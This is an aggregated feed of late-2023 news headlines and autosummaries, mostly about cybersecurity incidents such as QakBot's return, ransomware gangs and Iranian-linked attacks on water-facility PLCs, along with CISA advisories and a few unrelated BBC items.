    "

    Autosummary: "

    ---

    China to increase curbs on video gaming industry

    industry
    2023-12-22 https://www.bbc.co.uk/news/technology-67801091?at_medium=RSS&at_campaign=KARANGA
    New plans to restrict the online gaming industry in the country send shares in tech giants tumbling. "

    Autosummary: "

    ---

    A closer look at the manufacturing threat landscape

    industry
    2023-12-21 https://www.helpnetsecurity.com/2023/12/21/manufacturers-threats-video/
    

    The manufacturing industry is embracing digital transformation to fuel efficiency and productivity. However, this evolution is accompanied by profound and growing cybersecurity challenges. In this Help Net Security video, Kory Daniels, CISO at Trustwave, discusses recent comprehensive research highlighting the distinct cybersecurity threats confronting manufacturers. Trustwave SpiderLabs has documented the attack flow utilized by threat groups, exposing their tactics, techniques, and procedures. From email-borne malware to exploiting SMB and DCOM protocols for lateral movement, these … More →

    The post A closer look at the manufacturing threat landscape appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Supply chain emerges as major vector in escalating automotive cyberattacks

    industry ciber
    2023-12-20 https://www.helpnetsecurity.com/2023/12/20/automotive-cyberattacks-video/
    

    In this Help Net Security video, Jay Yaneza, Cybersecurity Architect at VicOne, discusses how, in the first half of the year, cyberattacks on the automotive sector caused losses exceeding $11 billion. These attacks mainly targeted automotive suppliers, not OEMs, showing an increasing trend in supply chain vulnerabilities. Over 90% of the attacks focused on entities other than OEMs.

    The post Supply chain emerges as major vector in escalating automotive cyberattacks appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Behind the Scenes of Matveev"s Ransomware Empire: Tactics and Team

    exploits ransomware industry
    2023-12-19 https://thehackernews.com/2023/12/behind-scenes-of-matveevs-ransomware.html
    Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world. Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, "

    Autosummary: Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what"s being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti. "

    ---

    CISA Urges Manufacturers Eliminate Default Passwords to Thwart Cyber Threats

    industry
    2023-12-18 https://thehackernews.com/2023/12/cisa-urges-manufacturers-eliminate.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations. In an alert published last week, the agency called out Iranian threat actors affiliated with "

    Autosummary: The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise - Enforce strong passwords and phishing-resistant MFA Ensure that only ports, protocols, and services with validated business needs are running on each system Configure Service accounts with only the permissions necessary for the services they operate Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems Discontinue reuse or sharing of administrative credentials among user/administrative accounts Mandate consistent patch management Implement network segregation controls Evaluate the use of unsupported hardware and software and discontinue where possible Encrypt personally identifiable information (PII) and other sensitive data On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes. "

    ---

    QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry

    exploits industry
    2023-12-18 https://thehackernews.com/2023/12/qakbot-malware-resurfaces-with-new.html
    A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets "

    Autosummary: "

    ---

    Qakbot is back and targets the Hospitality industry

    industry
    2023-12-18 https://securityaffairs.com/156047/cyber-crime/qakbot-targets-hospitality-industry.html
    Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. In August, the FBI announced that the Qakbot botnet was dismantled as a result of an international law enforcement operation named Operation ‘Duck Hunt.’ Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The […] "

    Autosummary: Qakbot is back and targets the Hospitality industry Pierluigi Paganini December 18, 2023 December 18, 2023 Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. "

    ---

    Qbot malware returns in campaign targeting hospitality industry

    exploits industry
    2023-12-17 https://www.bleepingcomputer.com/news/security/qbot-malware-returns-in-campaign-targeting-hospitality-industry/
    The QakBot malware is once again being distributed in phishing campaigns after the botnet was disrupted by law enforcement over the summer. [...] "

    Autosummary: In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV. "

    ---

    CISA urges tech manufacturers to stop using default passwords

    industry
    2023-12-15 https://www.bleepingcomputer.com/news/security/cisa-urges-tech-manufacturers-to-stop-using-default-passwords/
    Today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged technology manufacturers to stop providing software and devices with default passwords. [...] "

    Autosummary: "This SbD Alert urges technology manufacturers to proactively eliminate the risk of default password exploitation," CISA said, by taking "ownership of customer security outcomes" and building "organizational structure and leadership to achieve these goals. "

    ---

    Microsoft ICSpector: A leap forward in industrial PLC metadata analysis

    industry
    2023-12-14 https://www.helpnetsecurity.com/2023/12/14/microsoft-icspector-industrial-plc-metadata-analysis/
    

    Microsoft ICSpector is an open-source forensics framework that enables the analysis of industrial PLC metadata and project files. Architecture The framework provides investigators with a convenient way to scan for PLCs and identify any suspicious artifacts within ICS environments, which can be used for manual checking, automated monitoring tasks, or incident response operations to detect compromised devices. ICSpector allows investigators to review and customize the output to their requirements. It’s available on GitHub.

    The post Microsoft ICSpector: A leap forward in industrial PLC metadata analysis appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Industry regulations and standards are driving OT security priorities

    industry
    2023-12-13 https://www.helpnetsecurity.com/2023/12/13/ot-environments-ransomware-impact/
    

    When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. In Claroty’s previous survey conducted in 2021, 32% of ransomware attacks impacted IT only, while 27% impacted both IT and OT. Today, 21% impact IT only, while 37% impact both IT and OT – a significant 10% jump for the latter in just two years. This trend speaks to the expanding attack … More →

    The post Industry regulations and standards are driving OT security priorities appeared first on Help Net Security.

    "

    Autosummary: The most popular methods are the Common Vulnerability Scoring System (CVSS), used by 52% of global respondents, followed by existing security solutions’ risk scores (49%), the Exploit Prediction Scoring System (EPSS) (46%), and the Known Exploited Vulnerabilities (KEV) Catalog (45%). "

    ---

    How to choose a free vulnerability scanner: Insights from an industry veteran

    exploits industry
    2023-12-12 https://www.malwarebytes.com/blog/business/2023/12/how-to-choose-a-free-vulnerability-scanner-insights-from-an-industry-veteran
    How to choose a free vulnerability scanner? Industry expert Robert Elworthy has the answers. "

    Autosummary: Alternative: ThreatDown Vulnerability Assessment solution For teams seeking a streamlined approach, the ThreatDown Vulnerability Assessment solution, free for all ThreatDown customers, offers: Single, Lightweight Agent To simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. Elworthy, reflecting on his Langdale experience, highlights the importance of a tool capable of handling large-scale environments efficiently, a critical aspect for organizations with extensive networks: “Free tools often struggle with large networks,” Elworthy said.Elworthy points out the hidden labor costs in using “free” tools, which can affect team efficiency: “The time and labor required to maintain scans and update tools can be significant,” Elworthy said, reflecting on his time at Langdale. "

    ---

    Coral reef: How divers are using antibiotics to save sick corals

    industry
    2023-12-10 https://www.bbc.co.uk/news/world-latin-america-67647402?at_medium=RSS&at_campaign=KARANGA
    Turks and Caicos Islanders are helping protect the reef from the deadliest ever coral sickness. "

    Autosummary: "

    ---

    Third-party breaches shake the foundations of the energy sector

    industry
    2023-12-07 https://www.helpnetsecurity.com/2023/12/07/energy-industry-third-party-breaches/
    

    90% of the world’s largest energy companies experienced a third-party breach in the past 12 months, according to SecurityScorecard. Powering the global economy and everyday activities, the energy sector’s significance makes it a key focus for cyber threats. The urgency to protect this critical sector grows amid economic and political uncertainties. Cyberattacks on energy don’t just cause financial losses and disruptions; they also impact manufacturing, healthcare, and transportation. Third-party breaches in the energy industry 100% … More →

    The post Third-party breaches shake the foundations of the energy sector appeared first on Help Net Security.

    "

    Autosummary: Successful management of third-party cyber risks relies on achieving three essential outcomes: Efficient use of resources Effective risk management and resilience Impact on business decision-making “Hope and prayer may be useful but are clearly not sustainable strategies. "

    ---

    Microsoft Warns of COLDRIVER"s Evolving Evading and Credential-Stealing Tactics

    industry
    2023-12-07 https://thehackernews.com/2023/12/microsoft-warns-of-coldrivers-evolving.html
    The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It"s also called Blue Callisto, BlueCharlie (or TAG-53), "

    Autosummary: The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said. "

    ---

    21 high-risk vulnerabilities in OT/IoT routers found

    industry
    2023-12-06 https://www.helpnetsecurity.com/2023/12/06/vulnerabilities-ot-iot-routers/
    

    Forescout detailed the discovery of 21 new vulnerabilities in OT/IoT routers and open-source software elements. The “SIERRA:21 – Living on the Edge” report features research into Sierra Wireless AirLink cellular routers and some open-source components, such as TinyXML and OpenNDS. Sierra Wireless routers are popular — an open database of Wi-Fi networks shows 245,000 networks worldwide running Sierra Wireless for various applications. For example, Sierra Wireless routers are used for police vehicles connecting to a … More →

    The post 21 high-risk vulnerabilities in OT/IoT routers found appeared first on Help Net Security.

    "

    Autosummary: Regions with the highest number of exposed devices include: 68,605 devices in The United States 5,580 devices in Canada 3,853 devices in Australia 2,329 devices in France 1,001 devices in Thailand Among the 21 vulnerabilities, one has critical severity (CVSS score 9.6), nine have high severity, and 11 have medium severity. "

    ---

    Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq

    industry ciber
    2023-12-05 https://www.helpnetsecurity.com/2023/12/05/resecurity-ics-technologies-iraq-partnership/
    

    Resecurity and ICS Technologies IRAQ, a well-established ICT System Integration Company with HQ in Baghdad, Iraq, have joined forces to fortify cybersecurity, fraud prevention and risk intelligence measures nationwide. This strategic partnership is poised to bring intelligence-driven defensive solutions to Iraq, helping consumers and organizations safeguard their digital assets and combat the evolving threat landscape. Resecurity, headquartered in the United States, is renowned for its innovative cybersecurity products and threat intelligence services. Under the visionary … More →

    The post Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq appeared first on Help Net Security.

    "

    Autosummary: Key highlights of the partnership: Advanced cybersecurity solutions: Resecurity, known for its advanced threat intelligence, threat hunting, incident response, and digital risk management solutions, will provide Iraq-based organizations with state-of-the-art cybersecurity tools to protect against a wide range of cyber threats. "

    ---

    Essequibo: Venezuelans vote to claim Guyana-controlled oil region

    industry
    2023-12-04 https://www.bbc.co.uk/news/world-latin-america-67610200?at_medium=RSS&at_campaign=KARANGA
    Over 95% of voters approve a territorial claim to oil-rich Essequibo, electoral officials say. "

    Autosummary: "

    ---

    New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices

    industry
    2023-12-04 https://thehackernews.com/2023/12/new-p2pinfect-botnet-mips-variant.html
    Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that"s capable of targeting routers and IoT devices. The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach. "It"s highly likely that by targeting MIPS, the P2PInfect developers "

    Autosummary: "

    ---

    CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities

    industry
    2023-12-04 https://www.helpnetsecurity.com/2023/12/04/cyberav3ngers-unitronics-plcs/
    

    Iran-affiliated attackers CyberAv3ngers continue to exploit vulnerable Unitronics programmable logic controllers (PLCs), US and Israeli authorities have said in a joint cybersecurity advisory. CyberAv3ngers targeting Unitronics PLCs CISA has recently confirmed that Iran-affiliated attackers took over a Unitronics Vision Series PLC at a water system facility in Pennsylvania, and urged other water authorities to promptly secure their Unitronics PLCs. The agency has advised them to change the default password and port used by the PLC, … More →

    The post CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities appeared first on Help Net Security.

    "

    Autosummary: Finally, they called on device manufacturers to do their part in securing OT devices by: Not shipping products with default passwords Avoiding the exposure of administrative interfaces to the internet Not imposing additional fees for security features Making sure the devices support MFA Other Iran-affiliated threat groups to look out for CyberAv3ngers are not the only Iranian cyber threat actors targeting Israeli and US entities, Check Point researchers pointed out. "

    ---

    New P2PInfect bot targets routers and IoT devices

    industry
    2023-12-04 https://securityaffairs.com/155206/malware/p2pinfect-bot-routers-iot-devices.html
    Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. Researchers at Cado Security Labs discovered a new variant of the P2Pinfect botnet that targets routers, IoT devices, and other embedded devices. This variant has been compiled for the Microprocessor without Interlocked Pipelined Stages (MIPS) architecture. The new bot supports updated […] "

    Autosummary: New P2PInfect bot targets routers and IoT devices Pierluigi Paganini December 04, 2023 December 04, 2023 Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. "

    ---

    Essequibo: Venezuela votes on claim to Guyana-controlled oil region

    industry
    2023-12-03 https://www.bbc.co.uk/news/world-latin-america-67583582?at_medium=RSS&at_campaign=KARANGA
    The referendum asks if Venezuelans support the claim to two thirds of the land controlled by Guyana. "

    Autosummary: "

    ---

    IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities

    exploits industry
    2023-12-01 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a
    

    SUMMARY

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.

    The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations.

    Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially cr "

    Autosummary: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.SUMMARY The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. On October 18, 2023, the CyberAv3ngers-linked Soldiers of Solomon claimed responsibility for compromising over 50 servers, security cameras, and smart city management systems in Israel; however, majority of these claims were proven false. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. "

    ---

    CISA urges water facilities to secure their Unitronics PLCs

    industry
    2023-11-30 https://www.helpnetsecurity.com/2023/11/30/water-system-secure-plcs/
    

    News that Iran-affiliated attackers have taken over a programmable logic controller (PLC) at a water system facility in Pennsylvania has been followed by a public alert urging other water authorities to immediately secure their own PLCs. “The cyber threat actors likely accessed the affected device—a Unitronics Vision Series PLC with a Human Machine Interface (HMI)—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet,” the Cybersecurity and Infrastructure Security Agency (CISA) noted. … More →

    The post CISA urges water facilities to secure their Unitronics PLCs appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Business metrics for Cisco Cloud Observability capability enables customers to protect revenue

    industry
    2023-11-29 https://www.helpnetsecurity.com/2023/11/29/cisco-cloud-observability-business-metrics/
    

    Cisco announced new business metrics in Cisco Cloud Observability. Powered by the Cisco Observability Platform to enhance business context for modern applications running on AWS. This latest release also supports integration with AWS services and application performance monitoring (APM) correlation and provides end-to-end visibility into the performance of cloud native applications. Traditional application monitoring tools only provide visibility of application and infrastructure performance metrics. This leaves teams— including ITOps, DevOps and SREs— managing modern applications … More →

    The post Business metrics for Cisco Cloud Observability capability enables customers to protect revenue appeared first on Help Net Security.

    "

    Autosummary: Cisco Cloud Observability will allow us to visualize and correlate metrics, events, logging, and tracing (MELT) data so we can identify, triage, and troubleshoot problems at an even greater velocity,” said Alice McElroy, Director, IT Operational Excellence, Royal Caribbean. "

    ---

    Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

    exploits industry
    2023-11-29 https://thehackernews.com/2023/11/iranian-hackers-exploit-plcs-in-attack.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that it"s responding to a cyber attack that involved the active exploitation of Unitronics programmable logic controllers (PLCs) to target the Municipal Water Authority of Aliquippa in western Pennsylvania. The attack has been attributed to an Iranian-backed hacktivist collective known as Cyber Av3ngers. "Cyber threat "

    Autosummary: "

    ---

    Microsoft starts testing new Windows 11 Energy Saver feature

    industry
    2023-11-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-testing-new-windows-11-energy-saver-feature/
    Microsoft has started testing a new Windows 11 Energy Saver feature that helps customers extend their portable computers" battery life. [...] "

    Autosummary: "

    ---

    Hackers breach US water facility via exposed Unitronics PLCs

    industry
    2023-11-29 https://www.bleepingcomputer.com/news/security/hackers-breach-us-water-facility-via-exposed-unitronics-plcs/
    CISA (Cybersecurity & Infrastructure Security Agency) is warning that threat actors breached a U.S. water facility by hacking into Unitronics programmable logic controllers (PLCs) exposed online. [...] "

    Autosummary: "Cyber threat actors are targeting PLCs associated with WWS facilities, including an identified Unitronics PLC, at a U.S. water facility," reads CISA"s alert. "

    ---

    N. Korean Hackers "Mixing" macOS Malware Tactics to Evade Detection

    exploits industry
    2023-11-28 https://thehackernews.com/2023/11/n-korean-hackers-mixing-and-matching.html
    The North Korean threat actors behind macOS malware strains such as RustBucket and KANDYKORN have been observed "mixing and matching" different elements of the two disparate attack chains, leveraging RustBucket droppers to deliver KANDYKORN. The findings come from cybersecurity firm SentinelOne, which also tied a third macOS-specific malware called ObjCShellz to the RustBucket campaign. "

    Autosummary: "

    ---

    Cybellum achieves significant market share growth among leading medical device manufacturers

    industry
    2023-11-28 https://www.helpnetsecurity.com/2023/11/28/cybellum-medical-device-manufacturers-market-share/
    

    Cybellum announced that Cybellum has significantly increased its market share amongst leading medical device manufacturers (MDMs). Working with companies across the industry, Cybellum’s approach provides risk visibility throughout the full product lifecycle. It also presents opportunities to manage risks so product security teams can make decisions that balance their security demands with business requirements. In today’s complex healthcare landscape with increasing regulatory oversight, medical device manufacturers are facing two main challenges. The first is managing … More →

    The post Cybellum achieves significant market share growth among leading medical device manufacturers appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Qilin ransomware claims attack on automotive giant Yanfeng

    exploits ransomware industry
    2023-11-28 https://www.bleepingcomputer.com/news/security/qilin-ransomware-claims-attack-on-automotive-giant-yanfeng/
    The Qilin ransomware group has claimed responsibility for a cyber attack on Yanfeng Automotive Interiors (Yanfeng), one of the world"s largest automotive parts suppliers. [...] "

    Autosummary: It sells interior components to General Motors, the Volkswagen Group, Ford, Stellantis (Fiat, Chrysler, Jeep, Dodge), BMW, Daimler AG, Toyota, Honda, Nissan, and SAIC Motor. "

    ---

    Rhysida ransomware gang claimed China Energy hack

    exploits ransomware industry
    2023-11-25 https://securityaffairs.com/154785/cyber-crime/rhysida-ransomware-china-energy.html
    The Rhysida ransomware group claimed to have hacked the Chinese state-owned energy conglomerate China Energy Engineering Corporation. The Rhysida ransomware gang added the China Energy Engineering Corporation to the list of victims on its Tor leak site. The China Energy Engineering Corporation (CEEC) is a state-owned company in China that operates in the energy and […] "

    Autosummary: “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "

    ---

    Automotive parts giant AutoZone disclosed data breach after MOVEit hack

    financial industry
    2023-11-23 https://securityaffairs.com/154633/data-breach/autozone-data-breach-after-moveit-hack.html
    American retailer and distributor of automotive parts and accessories AutoZone discloses a data breach after a MOVEit attack. AutoZone is an American retailer and distributor of automotive parts and accessories. The company is one of the largest aftermarket automotive parts and accessories retailers in the United States. AutoZone operates 7,140 stores across the United States, […] "

    Autosummary: Below is the list of organizations with the highest number of impacted individuals: Organization Individuals Maximus 11 million Pôle emploi 10 million Louisiana Office of Motor Vehicles 6 million Colorado Department of Health Care Policy and Financing 4 million Oregon Department of Transportation 3.5 million Teachers Insurance and Annuity Association of America 2.6 million Genworth 2.5 million PH Tech 1.7 million Milliman Solutions 1.2 million Wilton Reassurance Company 1.2 million “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.” "

    ---

    DarkGate and PikaBot Malware Resurrect QakBot"s Tactics in New Phishing Attacks

    financial exploits industry
    2023-11-20 https://thehackernews.com/2023/11/darkgate-and-pikabot-malware-resurrect.html
    Phishing campaigns delivering malware families such as DarkGate and PikaBot are following the same tactics previously used in attacks leveraging the now-defunct QakBot trojan. “These include hijacked email threads as the initial infection, URLs with unique patterns that limit user access, and an infection chain nearly identical to what we have seen with QakBot delivery,” Cofense said in a report "

    Autosummary: "

    ---

    Rise in automated attacks troubles ecommerce industry

    industry
    2023-11-17 https://www.helpnetsecurity.com/2023/11/17/online-retailers-automated-attacks-threat/
    

    Automated attacks on application business logic, carried out by sophisticated bad bots, were the leading threat for online retailers, according to Imperva. In addition, account takeover, DDoS, API abuse, and client-side attacks were significant risks. The ecommerce industry remains a lucrative target for cybercriminal activity. Built on a vast network of API connections and third-party dependencies, online retailers are increasingly vulnerable to business logic abuse and client-side attacks. Motivated cybercriminals are also eager to compromise … More →

    The post Rise in automated attacks troubles ecommerce industry appeared first on Help Net Security.

    "

    Autosummary: “The security risks that the retail industry faces are more sophisticated, automated, and harder to detect,” says Karl Triebes, SVP and GM, Application Security, Imperva. Security incidents spike amid shopping season A successful security incident can lead to higher infrastructure and support costs, degraded online services, and, ultimately, customer churn. "

    ---

    FBI shares tactics of notorious Scattered Spider hacker collective

    industry
    2023-11-16 https://www.bleepingcomputer.com/news/security/fbi-shares-tactics-of-notorious-scattered-spider-hacker-collective/
    The Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency released an advisory about the evasive threat actor tracked as Scattered Spider, a loosely knit hacking collective that now collaborates with the ALPHV/BlackCat Russian ransomware operation.. [...] "

    Autosummary: Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factory authentication push bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations.Remote web server access via internet tunneling Pulseway : Remote system monitoring and management : Remote system monitoring and management Screenconnect : Network device remote connection management : Network device remote connection management Splashtop : Network device remote connection management : Network device remote connection management Tactical. "

    ---

    Nuclear and oil & gas are major targets of ransomware groups in 2024

    exploits ransomware industry
    2023-11-15 https://www.helpnetsecurity.com/2023/11/15/2024-ransomware-groups-targets/
    

    Resecurity, Inc. (USA) protecting major Fortune 100 and government agencies globally has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware attackers have targeted energy installations in North America, Asia, and the European Union. In the EU, Handelsblatt reported that ransomware attacks targeting the energy sector more than doubled in 2022 over the previous year, with defenders recording 21 attacks through … More →

    The post Nuclear and oil & gas are major targets of ransomware groups in 2024 appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Collaborative strategies are key to enhanced ICS security

    industry
    2023-11-14 https://www.helpnetsecurity.com/2023/11/14/marko-gulan-schneider-electric-industrial-control-systems-security/
    

    In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS). Our conversation will explore the importance of cross-departmental collaboration, balancing security with system functionality, and the dynamic nature of security measures that evolve with emerging threats. We’ll also look at the critical synergy between IT and OT departments and the role of the IEC 62443 standards in staying ahead in the threat … More →

    The post Collaborative strategies are key to enhanced ICS security appeared first on Help Net Security.

    "

    Autosummary: The IT department is usually responsible for managing computer systems, networks, and data, while the OT department manages operating systems, industrial control systems, and sensors. In addition, the IEC 62443 standard also promotes cooperation between various stakeholders, including manufacturers, operators, system integrators and security professionals.In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS).This includes the application of technical security controls, such as firewalls, antivirus programs, encryption, and access controls. "

    ---

    Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024

    exploits ransomware industry
    2023-11-14 https://securityaffairs.com/154113/malware/ransomware-gangs-targets-nuclear-and-oil-gas-2024.html
    

    Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. Resecurity, Inc. (USA) protecting major Fortune 100 and government agencies globally has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware […]

    The post Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024 appeared first on Security Affairs.

    "

    Autosummary: Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024 Pierluigi Paganini November 14, 2023 November 14, 2023 Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. "

    ---

    Amazon latest firm to cut jobs in gaming industry

    industry
    2023-11-14 https://www.bbc.co.uk/news/technology-67417330?at_medium=RSS&at_campaign=KARANGA
    It has been a banner year for video games, yet studios continue to sack staff. "

    Autosummary: "

    ---

    Danish energy sector hit by a wave of coordinated cyberattacks

    industry ciber
    2023-11-14 https://www.helpnetsecurity.com/2023/11/14/danish-energy-sector-cyberattack/
    

    The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT. Danish energy sector under attack SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. From this vantage point, in May 2023, they detected three waves of attacks targeting companies in … More →

    The post Danish energy sector hit by a wave of coordinated cyberattacks appeared first on Help Net Security.

    "

    Autosummary: Danish energy sector under attack SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. "

    ---

    Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard

    industry
    2023-11-13 https://www.helpnetsecurity.com/2023/11/13/sumedh-thakar-qualys-trurisk-platform/
    

    In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk. We delve into how Qualys assists CISOs in the complex balancing act of managing critical issues under budget constraints, the financial implications of cyber risk, and the advanced capabilities of the TruRisk Platform in providing a unified view of … More →

    The post Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard appeared first on Help Net Security.

    "

    Autosummary: In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk.However, as cyber risk has become a dominant contributor to any organizations’ overall risk posture, de-risking a business from cyber risk has become a central focus of executive stakeholders, from the CEO to the board of directors. Today, nearly every business is a software business, relying on software to run core operations, which makes them susceptible to elevated cyber risk and breaches. "

    ---

    Impinj R720 reader optimizes speed and automation in supply chain and logistics

    industry
    2023-11-13 https://www.helpnetsecurity.com/2023/11/13/impinj-r720-rain-rfid-reader/
    

    Impinj announced the Impinj R720 RAIN RFID reader. With more processing power and memory than Impinj’s prior-generation reader, the Impinj R720 speeds edge processing and reduces network load and latency, allowing on-reader applications to meet the most demanding requirements of large-scale enterprise deployments. “Enterprises see increasing demand for reliable, real-time data about every item they manufacture, transport and sell,” said Jeff Dossett, Impinj CRO. “The Impinj R720 reader delivers powerful edge processing to support application … More →

    The post Impinj R720 reader optimizes speed and automation in supply chain and logistics appeared first on Help Net Security.

    "

    Autosummary: The Impinj R720 reader further advances the proven Impinj platform, an end-to-end RAIN RFID platform with tag chips, reader chips, readers, software, testing solutions, services, and a global partner ecosystem. "

    ---

    Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack

    financial exploits ransomware industry
    2023-11-10 https://securityaffairs.com/153986/hacking/icbc-ransomware-attack.html
    

